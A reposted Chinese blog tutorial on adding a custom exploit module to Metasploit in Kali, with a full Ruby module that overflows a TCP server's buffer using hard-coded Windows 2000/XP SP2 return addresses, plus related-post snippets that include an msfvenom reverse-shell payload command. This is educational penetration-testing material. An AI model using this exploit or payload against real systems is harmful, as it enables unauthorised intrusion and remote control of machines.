给kali的metasploit下添加一个新的exploit

Metasploit自定义漏洞模块
最新推荐文章于 2025-03-09 22:12:30 发布
转载 最新推荐文章于 2025-03-09 22:12:30 发布 · 6.8k 阅读 · 3

本文介绍如何在Metasploit中创建自定义的漏洞利用模块。通过在特定目录下建立新文件夹并修改示例脚本,可以实现对TCP服务器解析错误的攻击。文章详细解释了修改脚本的方法,包括设置模块属性、定义攻击行为等。

首先在/usr/share/metasploit-framework/modules/exploits/目录下新建一个自定义文件夹,例如fwdtest

 

cp example.rb ./fwdtest/0day1.rb

根据0day安全书中例子修改0day1.rb脚本

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => 'failwest_test',
        'Description'    => %q(
            This exploit module illustrates how a vulnerability could be exploited
          in an TCP server that has a parsing bug.
        ),
		'License'        => MSF_LICENSE,
		'Author'         => ['skape'],
		'References'     =>
          [
            [ 'OSVDB', '12345' ],
            [ 'EDB', '12345' ],
            [ 'URL', 'http://www.example.com'],
            [ 'CVE', '1978-1234']
          ],
        'Payload'        =>
          {
            'Space'    => 200,
            'BadChars' => "\x00"
          },
        'Targets'        =>
          [
            [
              'Windows 2000',
              {
                'Platform' => 'win',
                'Ret'      => 0x77F8511a
              }
            ],
			[
              'Windows XP SP2',
              {
                'Platform' => 'win',
                'Ret'      => 0x7C914393
              }
            ]
          ],
		'DisclosureDate' => "Apr 1 2013",
		'DefaultTarget'  => 0
      )
    )
  end

  def check
    Exploit::CheckCode::Vulnerable
  end

  def exploit
    connect
	attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded
	sock.put(attack_buf)
	handler
	disconnect
  end
end

 

在控制台下启动metasploit

 

在msf提示符下输入reload_all重新加载所有模块

 

在msf提示符下输入use exploit/fwdtest/0day1  输入的时候可以用tab补全,如果不能补全说明就有问题

 

 

whatday
关注
Metasploit Framework的 module 模板结构
shawdow_bug的博客
11-26 3640
Metasploit Framework简称msf,是一个渗透测试平台,集成大量可用于渗透测试的模块,并且提供了模块的统一编规范,可自行按照规范编模块,并允许在自己的模块包含平台中的其他模块,最后把模块集成到 msf 中即可使用。因此,msf 既是一款工具,也是一个平台。 msf 的模块主要用 Ruby 语言编,为什么是主要呢?因为在新版本中也给出了 python 的模板。 以实现 exploit 模块为例子,官方给出的针对 web 服务的模板文件在 metasploit-framework/mo
kali metasploit 后渗透Post模块
qq_51685718的博客
10-28 529
如果是获取shell后权限是比较低的,post模块中有一个检测目标系统补丁然后会给出相应exp提权的功能。我这由于没安装火狐导致报错。
添加新的exploitmetasploit中去
www.i201314.net
07-03 2268
以 msf4.3.0为例 新漏洞(ie_iepeers_pointer.rb)   漏洞一般放在  opt/metasploit-4.3.0/msf3/modules/exploits 文件夹下    下面有多不同类型的漏洞 如果是windows系统 那么就放在windows下,  针对什么服务的就放在相应的文件夹下    比如(ie_iepeers_pointer.rb)
metasploit基础命令介绍
xxx9686的博客
09-16 924
msfvenom(融合了msfpayload、msfencode 的所有功能)、msfpayload(新版本已取消)、msfencode(新版取消)五.编码器模块(encode):攻击载荷与空指令模块组装完成一个指令序列后,在这段指令被渗透攻击模块加入邪恶数据。四.空指令模块(Nop):空指令(NOP)是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,三.攻击载荷模块(payload):攻击载荷是在渗透攻击成功后促使目标系统运行的一段植入代码。
4.2 metasploit 开发 exploit
qq_55202378的博客
08-25 904
msf exploit
Metasploit系列----模块详解
bronze_s的博客
04-25 1754
kali linux中默认集成了metasploit Framework社区版本,是精简后的免费版本。使用者多为安全研究人员或学生。 metasploit中的模块分类 exploit(渗透模块): 是一段程序,运行时会利用目标的安全漏洞进行安全测试。 payload(安全测试载荷模块): 在成功对目标完成一次渗透测试,payload将在目标机器运行,帮助我们获取目标上需要的访问和运行权限。 auxiliary(辅助模块): 包含扫描、fuzz测试、漏洞挖掘、网络协议欺骗等程序。 encoder(编码器模
Metasploit渗透基础(利用kali 自带工具Metasploit进行渗透测试)
m0_65033889的博客
06-20 1887
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。(了解POC/EXP概念)Metasploit 框架是可以添加漏洞代码片段,就好比一个军火库,它里面有各种武器供我使用,当然也有新的武器被研发出来,放到武器库里面后,我也可以使用,这就是框架的好处,新的攻击代码可以比较容易的加入 MSF框架供大家使用。
kali下使用metasploit木马进行远程控制
m0_46371267的博客
05-11 1207
环境:ubuntun+kali2020.4 本次实验需要两台虚拟机kali及ubuntun 注:kali地址为192.168.147.137 ubuntun的地址为192.168.147.129 本人使用ssh链接 ssh链接ubuntun 并进入root权限 ssh链接kalikali下root权限下生成payload(也就是木马) msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.147.137 LPORT=4444 -
kali linux渗透攻击基于漏洞工具Metasploit
xiaoma920的博客
05-25 1060
该文章只提供学习,禁止做违法的事情,任何后果与作者无关2.第二百八十五条第二款 违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
【DeepExploit】基于Metasploit的自动渗透工具在Kali中详细运行教程
Zichel77的博客
10-11 3174
DeepExploit是基于强化学习的一款自动化渗透工具
如何更新msf及其结构
10-08
更新msf 及其结构 exploit framework 的利用 很不错的哦
【详解】Kali中一键更新Metasploit框架
牛肉胡辣汤
12-21 1345
Metasploit 框架是一个流行的开源渗透测试工具,它为安全专业人员提供了强大的功能来发现和利用目标系统中的漏洞。Kali Linux 作为一款专门为渗透测试和数字取证而设计的操作系统,预装了 Metasploit 框架。然而,为了保持 Metasploit 的最新状态,我们需要定期更新它。本文将介绍如何在 Kali Linux 中一键更新 Metasploit 框架。通过使用 ​​ 命令或 Metasploit 控制台中的 ​。
更新KaliMetasploit框架,这些过程千万不要踩雷
weixin_59086772的博客
02-24 4370
本篇文章为大家分享在更新kaliMetasploit框架过程中容易踩的坑,已帮各位实践,下次更新时可避免。 Kali就不做过多介绍了,初学者一般都知道它的作用,就简单介绍Metasploit是一款免费可下载的框架,通过它可以很容易地获取开发并针对软件漏洞尝试攻击,它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。 前言 不想升级一整个kali,就想把MSF框架更新一下,从版本5更新到把版本6 好家伙,不更新不知道,一更新直接呆住了,时间长不说还繁琐。 apt install metasploit
每周一个网络安全相关工具——MetaSpLoit
w2361734601的博客
03-09 918
Metasploit的灵活性和模块化设计使其成为渗透测试的核心工具。通过结合漏洞利用、Payload生成和后渗透操作,用户可高效完成从信息收集到权限维持的全流程测试。实际使用中需注意法律合规性,避免非法攻击。更多细节可参考优快云博客中的完整教程。
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了。
资深程序员,曾自学JAVA,C#,如今从业于网安行业
03-01 1308
通过本篇文章,我们将会学习以下内容:1、在Windows上安装Metasploit2、在Linux和MacOS上安装Metasploit3、在Kali Linux中使用 Metasploit4、升级Kali Linux5、使用虚拟化软件构建渗透测试实验环境6、配置SSH连接7、使用SSH连接Kali8、配置PostgreSQL数据库9、创建工作区10、使用数据库11、使用hosts命令12、理解services命令。
Kali操作系统上使用metasploit
weixin_55280439的博客
03-29 4101
meterpreter 是强大的后渗透模块,可以输入help 查看帮助信息,远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统.......这些看起来非常复杂又高级的操作都能用meterpreter 中的一行或几个字母,简单的命令完成。[*Payload 是攻击载荷,就是攻击完成后想获取的东西,这里是想获取 meterpreter](注:显示攻击失败表示目标主机上没有此漏洞,此漏洞只适用于攻击自己的win7靶机,高版本的系统已经修复此漏洞,显示WIN 表示攻击成功,其他则是失败)
Kali_Metasploit基础操作大全
carmi的博客
09-17 490
Kali_Metasploit基础操作大全 Metasploit基础 1、进入Metasploit控制台 msfconsole 2、更新Metasploit成最新的版本 apt-get install metasploit-framework apt-get update apt-get upgrade 3、Metasploit的安装目录 cd /usr/share/metasploit-fra...
kali下的Metasploit升级更新至5.0.62
zb0567的专栏
06-15 3346
apt-get remove metasploit-framework apt-get install metasploit-framework 但是会出现各种问题 重装失败,显示找不到需要的软件,更换source源后重新安装。 vim /etc/apt/sources.list 添加这两行(任选) #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.u
metasploit的模块构成及功能分析
热门推荐
xysoul的专栏
04-07 1万+
metasploit的模块构成及功能分析 今天我们介绍一下metasploit的基础架构和 市面上介绍metasploit的书不少,网上metasploit的使用说明的文章更是满天飞,可是没有哪一本书或者哪一篇文章来介绍metasploit的目录结构和他的功能,今天我们就来介绍一下metasploit的文件结构和每个部分的功能以及参数。 exploit@ubuntu:/pentest/f
如何在kali里创建一个后门
最新发布
07-06
MetasploitKali Linux 中的一个强大框架,可用于开发、测试和执行漏洞利用代码。通过它生成一个反弹 Shell 的示例步骤如下: 1. 启动 Metasploit 框架: ```bash msfconsole ``` 2. 生成一个基于 ...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值